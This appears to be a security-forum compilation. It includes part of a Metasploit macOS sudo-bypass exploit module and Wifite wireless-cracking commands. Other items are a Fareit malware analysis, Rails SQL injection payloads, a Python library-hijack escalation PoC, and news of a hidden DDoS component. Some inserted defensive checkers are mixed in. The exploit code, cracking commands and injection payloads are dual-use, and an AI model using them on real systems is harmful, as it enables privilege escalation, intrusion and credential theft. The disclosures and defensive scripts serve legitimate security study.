    @networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime") =~ (/On$/)
    @zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone").match(/^time zone: (.*)$/i)[1]
    @network_server = if @networked
      cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver").match(/time server: (.*)$/i)[1]
    end

    run_sudo_cmd
  end

  def cleanup
    print_status("Resetting system clock to original values") if @time
    cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil?
    cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil?
    cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil?
    if @networked
      cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On")
      unless @network_server.nil?
        cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
      end
    end
    print_good("Completed clock reset.") if @time
  end

  private

  def run_sudo_cmd
    print_status("Resetting user's time stamp file and setting clock to the epoch")
    cmd_exec(
      "sudo -k; \n"+
      "#{SYSTEMSETUP_PATH} -setusingnetworktime Off -settimezone GMT"+
      " -setdate 01:01:1970 -settime 00:00"
    )

    # Run Test
    test = rand_text_alpha(4 + rand(4))
    sudo_cmd_test = ['sudo', '-S', ["echo #{test}"].shelljoin].join(' ')
    print_status("Testing that user has sudoed before...")
    output = cmd_exec('echo "" | ' + sudo_cmd_test)
    if output =~ /incorrect password attempts\s*$/i
      fail_with(Exploit::Failure::NotFound, "User has never run sudo, and is therefore not vulnerable. Bailing.")
    elsif output =~ /#{test}/
      print_good("Test executed successfully. Running payload.")
    else
      print_error("Unknown fail while testing, trying to execute the payload anyway...")
    end

    # Run Payload
    sudo_cmd_raw = if using_native_target?
      ['sudo', '-S', [drop_path].shelljoin].join(' ')
    elsif using_cmd_target?
      ['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ')
    end

    ## to prevent the password prompt from destroying session
    ## backgrounding the sudo payload in order to keep both sessions usable
    sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & true'
    print_status "Running command: "
    print_line sudo_cmd
    output = cmd_exec(sudo_cmd)
  end

  # helper methods for accessing datastore
  def using_native_target?; target.name =~ /native/i; end
  def using_cmd_target?; target.name =~ /cmd/i; end

  def drop_path
    @_drop_path ||= datastore['TMP_FILE'].gsub('<random>') { Rex::Text.rand_text_alpha(10) }
  end

  # checks that the user is in OSX's admin group, necessary to change sys clock
  def user_in_admin_group?
    cmd_exec("groups `whoami`").split(/\s+/).include?(SUDOER_GROUP)
  end

  # helper methods for dealing with sudo's vn num
  def parse_vn(vn_str); vn_str.split(/[\.p]/).map(&:to_i); end

  def vn_bt(vn, ranges) # e.g. ('1.7.1', [['1.7.0', '1.7.6p44']])
    vn_parts = parse_vn(vn)
    ranges.any? do |range|
      min_parts = parse_vn(range[0])
      max_parts = parse_vn(range[1])
      vn_parts.all? do |part|
        min = min_parts.shift
        max = max_parts.shift
        (min.nil? or (not part.nil? and part >= min)) and
          (part.nil? or (not max.nil? and part <= max))
      end
    end
  end
end

Source: Mac OS X Sudo Password Bypass ≈ Packet Storm
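As an added example, not code from the module above or from the Metasploit project: a small Python 3 check for whether a `sudo -V` version string falls inside the ranges the module lists (1.6.0 through 1.7.10p6 and 1.8.0 through 1.8.6p6), the kind of thing a fleet audit would run before deciding which hosts still need the patched sudo. It parses the `pN` patch level into a fourth numeric component and compares whole version tuples, so that, for instance, 1.7.2p7 counts as inside 1.6.0..1.7.10p6 even though its patch level is above 6, while 1.7.10p7 and 1.8.6p7 fall outside. The `sudo -V` transcript is constructed, and the function names are this example's own.

```python
import re
import subprocess

# Affected ranges as listed in the module above (inclusive, low to high).
VULNERABLE_RANGES = [("1.6.0", "1.7.10p6"), ("1.8.0", "1.8.6p6")]

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:p(\d+))?$")

def parse_version(text):
    """Turn '1.7.10p6' into (1, 7, 10, 6). A release with no 'p' level becomes
    (major, minor, micro, 0), so it sorts just below its own first patch release."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError("unrecognised sudo version string: %r" % text)
    return tuple(int(part or 0) for part in m.groups())

def is_vulnerable_version(text, ranges=VULNERABLE_RANGES):
    """True when the version lies inside any [low, high] range, compared as whole tuples
    rather than component by component."""
    v = parse_version(text)
    return any(parse_version(lo) <= v <= parse_version(hi) for lo, hi in ranges)

def version_from_sudo_output(output):
    """Pick the front-end version out of `sudo -V` output (first 'version X' occurrence)."""
    m = re.search(r"version\s+(\S+)", output, re.IGNORECASE)
    return m.group(1) if m else None

def audit_sudo_output(output):
    """Summarise a `sudo -V` transcript: which version was found and whether it is in range."""
    version = version_from_sudo_output(output)
    if version is None:
        return {"version": None, "vulnerable": False, "reason": "no version line found"}
    try:
        vulnerable = is_vulnerable_version(version)
    except ValueError as exc:
        return {"version": version, "vulnerable": False, "reason": str(exc)}
    return {"version": version, "vulnerable": vulnerable,
            "reason": "inside a listed range" if vulnerable else "outside all listed ranges"}

# Constructed sample in the shape `sudo -V` prints; not captured from a real host.
SAMPLE_OUTPUT = ("Sudo version 1.7.4p6\n"
                 "Sudoers policy plugin version 1.7.4p6\n"
                 "Sudoers file grammar version 40\n")

if __name__ == "__main__":
    print(audit_sudo_output(SAMPLE_OUTPUT))
    try:  # live check of the current host, if sudo is installed
        live = subprocess.run(["sudo", "-V"], capture_output=True, text=True, check=False).stdout
        print(audit_sudo_output(live))
    except FileNotFoundError:
        print("sudo not installed on this host")
```

The version number alone only says whether the binary has the fix; as the module's own checks show, the bypass also needs the user to be in the admin group and to have a sudo timestamp file, so a host flagged here is a candidate for patching, not a confirmed exposure.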
  15. Kali Linux on Galaxy Note 10.1

April 2, 2013
06. Kali Linux ARM Architecture

The Samsung Galaxy Note 10.1 is a 10.1-inch tablet computer designed, developed, and marketed by Samsung. The tablet incorporates a 1.4 GHz quad-core Exynos processor and 2 GB of RAM. The touch screen works surprisingly well with Kali, as does the wireless card; however, Bluetooth and audio are not yet functional on this image.

Stock Kali on Galaxy Note 10.1 – Easy Version

If all you want to do is to install Kali on your Galaxy Note 10.1, follow these instructions:

1. You'll need at least 7 GB free on your internal SD card for our image.
2. Root your Samsung Galaxy Note 10.1 if you have not already done so.
3. Download the Kali Linux Galaxy Note 10.1 image from our downloads area.
4. Rename the downloaded Kali image to linux.img and copy it to /storage/sdcard0.
5. Download our recovery.img file from here and copy it to /storage/sdcard0.
6. Get root on your Galaxy Note 10.1, change to /storage/sdcard0, and back up your recovery partition:

   dd if=/dev/block/mmcblk0p6 of=recovery.img_orig

7. dd the downloaded recovery.img image to the recovery partition:

   Alert! This process will overwrite your recovery partition. Please make sure you know what you are doing. You may brick your device if you fumble this.

   dd if=recovery.img of=/dev/block/mmcblk0p6

8. Reboot your Galaxy Note 10.1 into recovery mode. You can do this by turning it off, then pressing and holding both the power button and the volume up button. Once you see the "Samsung Galaxy Note 10.1" text appear, release the power button but keep pressing the volume up button. This should boot you into Kali and auto-login into Gnome. The root password is "changeme" (without the quotes!).
9. Open the onscreen keyboard by going to: Applications -> Universal Access -> Florence Virtual Keyboard.
10. Wireless works but seems to skip the scanning of networks without some massaging. If the Gnome Network Manager shows no wireless networks, simply add your wireless network as a "hidden" one and you should get connected as usual.

You can modify, debug, and explore our image easily from within your Galaxy Note, using a wonderful Android app called Linux Deploy.

Source: Kali Linux on Galaxy Note 10.1 | Kali Linux Official Documentation
  16. Wifite v2 is now available

What's new in this version:
- support for cracking WPS-encrypted networks (via reaver)
- 2 new WEP attacks
- more accurate WPA handshake capture
- various bug fixes

Version 2 does not include a GUI, so everything must be done at the command-line.

mention in the New York Times

Wifite was mentioned in the New York Times' article "New Hacking Tools Pose Bigger Threats to Wi-Fi Users" from February 16, 2011. Here is a link to the article.

introduction

Designed and tested on Linux; works with Backtrack 5, BlackBuntu, BackBox, and Pentoo! Linux only; no Windows or OSX support (but you're welcome to try).

purpose

To attack multiple WEP, WPA, and WPS encrypted networks in a row. This tool is customizable to be automated with only a few arguments. Wifite aims to be the "set it and forget it" wireless auditing tool.

features
- sorts targets by signal strength (in dB); cracks closest access points first
- automatically de-authenticates clients of hidden networks to reveal SSIDs
- numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
- customizable settings (timeouts, packets/sec, etc)
- "anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks are complete
- all captured WPA handshakes are backed up to wifite.py's current directory
- smart WPA de-authentication; cycles between all clients and broadcast deauths
- stop any attack with Ctrl+C, with options to continue, move onto next target, skip to cracking, or exit
- displays session summary at exit; shows any cracked keys
- all passwords saved to cracked.txt
- built-in updater: ./wifite.py -upgrade

requirements
- linux operating system (confirmed working on Backtrack 5, BackBox, BlackBuntu, Pentoo, Ubuntu 8.10 (BT4R1), Ubuntu 10.04, Debian 6, Fedora 16)
- tested working with python 2.6.x and python 2.7.x
- wireless drivers patched for monitor mode and injection. Most security distributions (Backtrack, BlackBuntu, etc) come with wireless drivers pre-patched
- aircrack-ng (v1.1) suite: available via apt (apt-get install aircrack-ng) or at the aircrack-ng website

suggested applications
- reaver, for attacking WPS-encrypted networks
- pyrit, cowpatty, tshark: not required, but help verify WPA handshake captures

For help installing any of these programs, see the installation guide (hosted on github).

execution

download the latest version:
  wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py
change permissions to executable:
  chmod +x wifite.py
execute:
  python wifite.py
or, to see a list of commands with info:
  ./wifite.py -help

screenshots

video tutorial (tutorial is for v1 of wifite. new videos coming soon)

capturing WPA handshake using Wifite (and then cracking with oclHashCat). video credit: Maurizio Schmidt

examples

the program contains lots of interactivity (waits for user input). these command-line options are meant to make the program 100% automated -- no supervision required.

to crack all WEP access points:
  ./wifite.py -all -wep
to crack all WPS access points with signal strength greater than (or equal to) 50dB:
  ./wifite.py -p 50 -wps
to attack all access points, use 'darkc0de.lst' for cracking WPA handshakes:
  ./wifite.py -all --dict /pentest/passwords/wordlists/darkc0de.lst
to attack all WPA access points, but do not try to crack -- any captured handshakes are saved automatically:
  ./wifite.py -all -wpa --dict none
to crack all WEP access points greater than 50dB in strength, giving 5 minutes for each WEP attack method, and send packets at 600 packets/sec:
  ./wifite.py --pow 50 -wept 300 -pps 600
to attempt to crack WEP-encrypted access point "2WIRE752" endlessly -- program will not stop until key is cracked or user interrupts with ctrl+C:
  ./wifite.py -e "2WIRE752" -wept 0

donations

If you wish to donate to this project, I ask that you donate instead to the aircrack-ng team or you could buy something from Tactical Network Solutions. These are the teams which produced the awesome open-source software that wifite depends on. Wifite would not exist if not for these amazing tools.

Source: wifite - automated wireless auditor - Google Project Hosting
  17. It can be very useful, a pity it loads so slowly...
  18. That's all! Mirror, all of them: https://rstforums.com/fisiere/blackhat.zip
  19. Popular download management program has hidden DDoS component, researchers say

Orbit Downloader's DDoS component is used to attack websites and can cause Internet connection problems for users

By Lucian Constantin
August 22, 2013 — IDG News Service

Recent versions of Orbit Downloader, a popular Windows program for downloading embedded media content and other types of files from websites, turn computers into bots and use them to launch distributed denial-of-service (DDoS) attacks, according to security researchers.

Starting with version 4.1.1.14, released in December, the Orbit Downloader program silently downloads and uses a DLL (Dynamic Link Library) component that has DDoS functionality, malware researchers from antivirus vendor ESET said Wednesday in a blog post.

The rogue component is downloaded from a location on the program's official website, orbitdownloader.com, the ESET researchers said. An encrypted configuration file containing a list of websites and IP (Internet Protocol) addresses to serve as targets for attacks is downloaded from the same site, they said.

Orbit Downloader has been developed since at least 2006 and, judging by download statistics from software distribution sites like CNET's Download.com and Softpedia.com, it is, or used to be, a popular program. Orbit Downloader has been downloaded almost 36 million times from Download.com to date and around 12,500 times last week. Its latest version is 4.1.1.18 and was released in May.

In a review of the program, a CNET editor noted that it installs additional "junk programs" and suggested alternatives to users who need a dedicated download management application.

When they discovered the DDoS component, the ESET researchers were actually investigating the "junk programs" installed by Orbit Downloader in order to determine if the program should be flagged as a "potentially unwanted application," known in the industry as PUA.

"The developer [of Orbit Downloader], Innoshock, generates its revenue from bundled offers, such as OpenCandy, which is used to install third-party software as well as to display advertisements," the researchers said, noting that such advertising arrangements are normal behavior for free programs these days. "What is unusual, though, is to see a popular utility containing additional code for performing Denial of Service (DoS) attacks," they said.

The rogue Orbit Downloader DDoS component is now detected by ESET products as a Trojan program called Win32/DDoS.Orbiter.A. It is capable of launching several types of attacks, the researchers said.

First, it checks if a utility called WinPcap is installed on the computer. This is a legitimate third-party utility that provides low-level network functionality, including sending and capturing network packets. It is not bundled with Orbit Downloader, but can be installed on computers by other applications that need it.

If WinPcap is installed, Orbit's DDoS component uses the tool to send TCP SYN packets on port 80 (HTTP) to the IP addresses specified in its configuration file. "This kind of attack is known as a SYN flood," the ESET researchers said.

Full article: http://ht.ly/ocw3t
  20. Using the Intel® C++ Compiler with Microsoft* Visual Studio 2012*

https://www.youtube.com/watch?v=Lk1IjgVg1ss&feature=youtu.be

Published on 22.08.2013

This video demonstrates how to use the Intel® C++ Compiler within Microsoft* Visual Studio 2012*.
  21. Your Guide for Migrating from 1024-bit to stronger SSL certificate key lengths

Managing certificates during a time of key size migration can be difficult. Website or production outages can be costly and have a negative impact on business. This guide aims to help educate and inform users of TLS/SSL certificates about the upcoming change in key lengths and gives tips on managing their transition to using stronger SSL certificates.

Download: http://csmres.co.uk/cs.public.upd/article-downloads/Your-Guide-To-Migrating-From-1024Bit-SSL.PDF
  22. Context Information Security
Research. Response. Assurance
www.contextis.com

White paper: Pixel Perfect Timing Attacks with HTML5
Paul Stone
whitepapers@contextis.co.uk
July 2013

Contents
- Abstract
- Thinking in Frames
- using requestAnimationFrame to time browser operations
- requestAnimationFrame and Timing Attacks
- Rendering Links and Redraw Events
- Detecting Redraw Events
- Calibration
- Results and Practicality
- Visibility
- Speed
- Reliability
- CSS, SVG and Filters
- Timing Attacks with SVG Filters
- Timing the speed of SVG filters
- History Sniffing with SVG Filters
- Reading Pixels
- Reading Text with Pixel Perfect OCR
- Conclusion
- Security Bug Reports and Disclosure
- About Context
- Works Cited

Download: http://contextis.co.uk/files/Browser_Timing_Attacks.pdf
  23. “Bank of America” Malware: An In-Depth Analysis

Posted by ThreatTrack Security Labs on August 20, 2013

Editor’s Note: Reginald Wong is a Heuristic Detection Supervisor in one of ThreatTrack Security’s research labs. He has been in the security industry for more than a decade.

Bank of America remains one of the largest and most well-known names in banking in the Americas. It has also remained one of the brands most used by spammers and phishers, along with Wells Fargo, JP Morgan Chase and Citi Bank. Year after year, spammers and phishers have been practicing the same method of luring unknowing recipients into opening their malicious attachments—therefore successfully infecting their computers if their devices were not properly secured—or giving out essential information about themselves like user names and passwords.

We see BoA spam in our Inbox or Spam mail folders every once in a while, whether we’re actual clients of the said bank or not. But have you ever been curious as to what a BoA malware looks like on the inside? Or what this malware would actually do on your system if you have fallen for the spam’s claims and opened the file? To answer these questions, and perhaps more, we fished out one of the latest spam samples we have in our honeypots to dissect its malicious attachment.

Overview: Spam and Attachment

This particular fake BoA mail that is spammed in the wild pretends to notify recipients that the sender has sent them instructions on how to create a password to open the bank’s supposed “secure e-mail”.

From: Marion.Palmer
To: {random}
Subject: Instructions Secured E-mail.pdf
Message body:

  I will forward the application through a secure e-mail. Attached are instructions for you to create a password to open the secure e-mail from us. Just a bit of security for when we transmit confidential information.

  Thanks,
  Marion.Palmer
  Bank of America
  Principal Business Relationship Manager
  Direct – 915-163-8526 office
  Cell – 915-092-0252 cell
  Marrion(dot)Palmer@bankofamerica(dot)com
  {disclaimer}

The attachment is a ZIP-compressed file with the name Secured E-mail.zip, which actually contains the executable (.EXE) file, Instructions Secured E-mail.exe, which has the icon of a legitimate Adobe PDF file. Notable details about this file show no program name nor company name. Legitimate files usually have this basic information.

Now Comes the Technical Part

Once users open the fake PDF file, naturally executing the malware, it begins to decrypt a couple of data blocks into newly allocated memory spaces that contain code that dynamically imports APIs for use in its later process. This initially results in these APIs:

Let me just mention that notable bugs can be seen when attempting to import more APIs. Simple string decryption is also incomplete.

Anyway, embedded into the file is an encrypted PE file (93,696 bytes). It allocates memory space for this file and decrypts it there. It then replaces the entire running malware with this new PE file by copying data (such as the list below) from it section by section:

- Use the VirtualProtect API to replace memory protection with WRITE access.
- Copy binary code and data of the section based on the virtual size indicated in the PE section headers.
- Restore the memory protection.

It then dynamically imports the APIs indicated in the new PE’s import section table, which results in the following APIs:

Since the running process has been replaced by a new PE file, some information in its Process Environment Block, such as the entry point and the image base, is changed. Finally, it returns to the modified process, starting at the entry point.

Still Fareit

We did a simple binary comparison and have determined that this malicious attachment is a variant of the Fareit malware, a family of Trojan information stealers. After further digging, we have unearthed other facts about this variant:

- Copies and possible updates of itself can be downloaded from the following URLs:
- Stolen information is sent to / updates are received from the following server sites:
- It uses the following list of passwords to force itself into accounts:
- It steals stored credentials from different applications, mostly from FTP clients. Below is its list of targets:

Common System Information
FAR/FAR2/FAR3 built-in ftp client
Windows/Total Commander built-in ftp client
Ipswitch WS_FTP client
CuteFTP
FlashFXP
FileZilla
FTP Commander
BulletProof FTP
SmartFTP 2.x-4.x
TurboFTP
FFFTP
CoffeeCupFTP
CoreFTP
FTP Explorer
Frigate3 FTP
SecureFX 6.6
UltraFXP 1.7
FTPRush 2.1.4, 2.1.5
WebSitePublisher 2.1.5
BitKinex 3.2.3
ExpanDrive 1.8.4
ClassicFTP 2.14
Fling 2.23
SoftX 3.3
Directory Opus 9.5.6.0.3937 (64-bit)
CoffeeCup FreeFTP 4.3 / DirectFTP
LeapFTP 2.6.2.470, 3.1.0.50
WinSCP 4.3.2 (Build 1201)
32bit FTP 11.07.01
NetDrive 1.2.0.4
WebDrive 9.16 (build 2385) 64-bit
FTP Control 4.5.0.0
Opera 6.x – 11.x
WiseFTP 1.x – 7.x
FTP Voyager 11.x-15.x
Mozilla Firefox 0.x-5.x
Mozilla Firefox FireFTP add-on
Mozilla SeaMonkey 1.x-2.x
Mozilla Flock 1.x-2.x
Mozilla Suite Browser 1.x
LeechFTP 1.3
Odin Secure FTP Expert
WinFTP
FTP Surfer 1.0.7
FTPGetter 3
ALFTP 5
IE 4-9
Dreamweaver CS5
DeluxeFTP 6
Google Chrome
Chromium & SRWare Iron
ChromePlus
Bromium (Yandex Chrome)
Nichrome
Comodo Dragon
RockMelt
K-Meleon
Epic
StaffFTP
AceFTP 3
Global Downloader
FreshFTP
BlazeFTP
NetFile
GoFTP
3D-FTP
EasyFTP
XFTP
RDP (Windows Remote Desktop Connections)
FTP Now
Robo-FTP
Certificate Grabber
LinasFTP
Cyberduck
Putty (Russian version)
Notepad++ (NppFTP plugin)
CoffeeCup Visual Site Designer
FTPShell
FTPInfo
NexusFile
FastStone Browser
CoolNovo
WinZip (built-in FTP backup settings)
Yandex.Internet
MyFTP
sherrod FTP
NovaFTP
Common Windows Mail decryption code
Windows Live Mail
Windows Mail
Becky!
Pocomail
IncrediMail
The Bat!
Outlook
Thunderbird
FastTrackFTP

Fareit has been around for two years now, and we have reason to believe that it continues to steal the same stored credentials from the above target applications. It is a sophisticated malware, and the criminals behind it have been making sure that its variants stay hidden from scanners by constantly applying different techniques, like code obfuscation and encryption, to cover the real code beneath. This, in turn, also makes it quite a challenge for researchers to probe deeper.

Reginald Wong

Source: “Bank of America” Malware: An In-Depth Analysis
  24. Rails SQL Injection

Overview

The Ruby on Rails web framework provides a library called ActiveRecord which provides an abstraction for accessing databases. This page lists many query methods and options in ActiveRecord which do not sanitize raw SQL arguments and are not intended to be called with unsafe user input. Careless use of these methods can open up code to SQL Injection exploits. The examples here do not include SQL injection from known CVEs and are not vulnerabilities themselves, only potential misuses of the methods. Please use this list as a guide of what not to do. This list is in no way exhaustive or complete! Please feel free to contribute.

Examples

Each method or option described below is accompanied by an example demonstrating how the ActiveRecord interface could be exploited if used unsafely. These are not necessarily the worst exploits; they represent just a small hint of what could be accomplished if one is not careful. The examples on this page were tested with Rails 3.2.13 and SQLite 3.

Interactive Version

Clone and run this site from the git repo to try out or modify the examples!
Documentation

Calculate Methods

There are several methods based around ActiveRecord::Calculations#calculate. calculate takes an operation, a column name, and an options hash similar to ActiveRecord::FinderMethods#find. Methods based on calculate are shortcuts for different operations, and take a column name and options hash as arguments. In addition to the vulnerable options listed for find, the column name argument can also accept SQL!

Calculation methods: average, calculate, count, maximum, minimum, sum

Example

This example finds the age of a specific user, rather than the sum of all user ages.

  params[:column] = "age) FROM users WHERE name = 'Bob';"
  Order.calculate(:sum, params[:column])

Query

  SELECT SUM(age) FROM users WHERE name = 'Bob' AS sum_id FROM "orders"

Result

  27

Full article: http://rails-sqli.org/
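To see why the column-name argument matters and what the usual guard looks like, here is an added example that is not code from rails-sqli.org or from ActiveRecord. It needs no database: ORDERS_COLUMNS is a constructed stand-in for what Order.column_names would return, and build_sum_sql_unsafe reproduces the shape of the SQL that calculate(:sum, column) emits for the page's example. The guard is the standard one, checking the caller's value against the model's real column names before it can reach SQL.

```ruby
# Added example, not code from rails-sqli.org or from ActiveRecord. It shows,
# without a database, what the calculate example above does to the query and
# the usual guard. ORDERS_COLUMNS is a constructed stand-in for
# Order.column_names; build_sum_sql_unsafe mirrors the SQL that
# calculate(:sum, column) produces for the page's example.

# Constructed column list for the "orders" table.
ORDERS_COLUMNS = %w[id user_id total age].freeze

class UnsafeColumnError < ArgumentError; end

# Unchecked: the column argument is interpolated into the statement as-is,
# which is why "age) FROM users WHERE name = 'Bob';" rewrites the query.
def build_sum_sql_unsafe(column)
  %(SELECT SUM(#{column}) AS sum_id FROM "orders")
end

# Guard: accept only a real column name, then quote it as an identifier so it
# can never be parsed as anything else.
def safe_column(column, allowed = ORDERS_COLUMNS)
  name = column.to_s
  unless allowed.include?(name)
    raise UnsafeColumnError, "#{name.inspect} is not a column of orders"
  end
  %("#{name}")
end

def build_sum_sql(column, allowed = ORDERS_COLUMNS)
  %(SELECT SUM(#{safe_column(column, allowed)}) AS sum_id FROM "orders")
end

# Crude illustration of what an injected column does to the unchecked query:
# it ends up with a second FROM clause, i.e. the caller's subquery replaced ours.
def injection_escapes?(column)
  build_sum_sql_unsafe(column).scan(/\bFROM\b/i).length > 1
end

# :accepted when the guard lets the value through, :rejected otherwise.
def column_verdict(column, allowed = ORDERS_COLUMNS)
  safe_column(column, allowed)
  :accepted
rescue UnsafeColumnError
  :rejected
end

if __FILE__ == $PROGRAM_NAME
  payload = "age) FROM users WHERE name = 'Bob';"   # the page's example input
  puts build_sum_sql_unsafe(payload)
  puts "verdict for payload: #{column_verdict(payload)}"
  puts "verdict for 'age':   #{column_verdict('age')}"
  puts build_sum_sql('age')
end
```

In a real Rails application the allowed list would be Order.column_names (or a smaller explicit set of columns the endpoint is meant to aggregate), and the same check applies to every method in the calculate family listed above, since they all pass the column argument through unchanged.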
  25. Allowing low privileged users to create directories in C:\

Published 15/08/2013 | By MRL

By default, Windows systems will allow low privileged users to create directories (but not files) in the root of the C: drive. In this post we ask if that’s really a security problem and ultimately conclude that, yes, sometimes it can be.

Default permissions

Depending on the version of Windows, various low privileged users are allowed to create directories in C:\. On Windows 7, for example, Authenticated Users are:

Or if you prefer the output of cacls, you can see this as the special permission “FILE_APPEND_DATA”:

On Windows 2003, you see something similar, but for the Users group:

(Don’t let the “FILE_WRITE_DATA” confuse you – that’s an “Inherit Only” permission).

Potential security problems

If we apply the principle of least privilege here, we’d probably conclude that normal users don’t really need to create directories in the root of the C: drive, so should not be allowed permissions to do so. But, in terms of specific security concerns, what’s the worst that could happen?

Malicious users could stash their hacking tools or data they’ve stolen in a place other than their home directory. C:\backup probably wouldn’t raise suspicions. This is certainly possible, but perhaps not the most compelling security concern.

What if the malicious user knew an automated installer would eventually install an application into C:\foo? Would the installer just fail? Or would it succeed, but leave the malicious user as the owner of the software directory? That’s not the subject of this post, but it sounds like a more concrete concern – but depends on predicting that a specific application will be installed.

What if an application on the system searched for its support files in non-existent locations that the malicious user could create, e.g. C:\my-dev-dlls? This is the possibility that I want to explore in this post.

Identifying programs accessing non-existent files

I used procmon to show me all the processes where file access resulted in a “NOT FOUND” error. The green ticks show the simple filter I used:

I opened up a few different programs to observe the various failed file access attempts and saw this one for C:\lib:

(I’ve blacked out the name of the process – partly because it’s not relevant, and partly because I haven’t mentioned this to the vendor yet).

So a malicious user on the system could create C:\lib. Then if the program attempts to read a file from there, the user could create that too. In this way, the malicious user could influence the execution of the program. The best case for an attacker is that the program will load some sort of code (e.g. DLL or EXE) from the directory. Next best case is some sort of configuration file that could cause the application to misbehave.

To determine what the program was searching for, I created C:\lib, then re-ran it. This time the program looked for C:\lib\SITE.PYC, C:\lib\OS.PY and C:\lib\OS.PY:

So the program is looking for some python libraries! After some experimentation, I found I needed to create os.py and site.py, then the program would execute those files when it loaded. I created a simple PoC along the lines of

  f = open('c:\lib\evil.txt', 'w')
  f.write('evil os.py was run')
  f.close()

So just before we attempt to exploit the program with our evil python scripts, the directory and permissions look like this:

After we launch the program, we can see it has run our evil payload:

No PoC is really complete without running some actual OS commands. However, I found this slightly problematic. Normally I’d do the following:

  import os
  os.system("calc")

But in this case, we’ve replaced os.py, rendering “import os” somewhat useless. I considered a few workarounds including calling out to WinExec in kernel32.dll via ctypes – but I didn’t have ctypes available in this environment. Eventually I found the simplest route was to load the real os.py (which lives in C:\python27\lib on my system):

  import sys
  sys.path.insert(1, 'c:\python27\lib') #prepend
  import os
  os.system("whoami >> c:\lib\whoami-site.txt")

Note that we prepend to the PYTHONPATH in order to look for os.py in the correct location first. This correctly runs whoami.exe and logs the output of who ran the program to a file. In this way our evil payload records all the unwitting users we could have run OS commands in the context of.

Conclusion

We’ve shown how a pretty low-tech approach to bug hunting could uncover a vulnerability that is made exploitable by the default file permissions on C:\. This could allow a malicious user on a terminal server (say) to cause other users to run code of their choosing. A simple privilege escalation attack – at the very least a horizontal privilege escalation.

The vulnerability could be caused by the way the application is coded or by a locally configured search path in the application’s environment. In this case, the principle of least privilege would have saved the day.

Source: Allowing low privileged users to create directories in C: | Portcullis Labs
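The procmon step above was done by hand in the GUI. The following is an added example, not Portcullis Labs' tooling, that does the same triage over a procmon CSV export: it keeps the "NAME NOT FOUND" accesses whose top-level directory under C:\ does not exist, because a directory at that level is exactly what the default ACL lets any authenticated user create, and reports them per process so an administrator can decide what to fix (the application's search path, the ACL on C:\, or both). The log lines and the list of existing root directories are constructed; the CSV layout is assumed to follow procmon's default export columns.

```ruby
# Added example; not Portcullis Labs' code. Automates the procmon triage from
# the post: from a procmon CSV export, keep the "NAME NOT FOUND" file accesses
# whose top-level directory under C:\ does not exist, since that is what the
# default ACL lets any authenticated user create. The log lines and the root
# directory list are constructed; the CSV layout is assumed to match
# procmon's default export columns.
require 'csv'

# Constructed procmon export: two processes probing paths that do not exist.
PROCMON_CSV = <<~CSV
  "Time of Day","Process Name","PID","Operation","Path","Result","Detail"
  "10:00:01.0000000","app.exe","1234","CreateFile","C:\\lib\\site.pyc","NAME NOT FOUND","Desired Access: Generic Read"
  "10:00:01.0000001","app.exe","1234","CreateFile","C:\\lib\\os.py","NAME NOT FOUND","Desired Access: Generic Read"
  "10:00:01.0000002","app.exe","1234","CreateFile","C:\\python27\\lib\\os.py","SUCCESS","Desired Access: Generic Read"
  "10:00:02.0000000","other.exe","2222","CreateFile","C:\\Windows\\System32\\missing.dll","NAME NOT FOUND","Desired Access: Generic Read"
  "10:00:03.0000000","other.exe","2222","CreateFile","C:\\my-dev-dlls\\helper.dll","NAME NOT FOUND","Desired Access: Generic Read"
  "10:00:04.0000000","app.exe","1234","CreateFile","D:\\data\\settings.ini","NAME NOT FOUND","Desired Access: Generic Read"
CSV

# Constructed snapshot of the directories already present in C:\. On a live
# Windows host this would come from Dir.children('C:/').
EXISTING_ROOT_DIRS = ['Windows', 'Program Files', 'Users', 'python27'].freeze

# First path component under C:\ ("lib" for C:\lib\os.py); nil for other volumes.
def root_dir_of(path)
  m = path.match(/\AC:\\([^\\]+)(?:\\|\z)/i)
  m && m[1]
end

# Map each process name to the non-existent C:\ root directories it looked
# under. A missing root that a low-privileged user can create is the
# precondition for the hijack the post demonstrates; a missing file under an
# existing, admin-owned root (C:\Windows\...) is not, so it is dropped.
def creatable_roots(csv_text, existing = EXISTING_ROOT_DIRS)
  known = existing.map(&:downcase)
  found = Hash.new { |h, k| h[k] = [] }
  CSV.parse(csv_text, headers: true).each do |row|
    next unless row['Result'] == 'NAME NOT FOUND'
    root = root_dir_of(row['Path'])
    next if root.nil? || known.include?(root.downcase)
    found[row['Process Name']] << root unless found[row['Process Name']].include?(root)
  end
  found.sort.to_h
end

if __FILE__ == $PROGRAM_NAME
  creatable_roots(PROCMON_CSV).each do |process, roots|
    puts "#{process}: probes non-existent, user-creatable root(s) #{roots.map { |r| 'C:\\' + r }.join(', ')}"
  end
end
```

Matching is case-insensitive because NTFS paths are, and the check only looks at the first component: a probe for C:\lib\os.py is reported as C:\lib, since creating that one directory is all the low-privileged user needs before the rest of the path is theirs to populate.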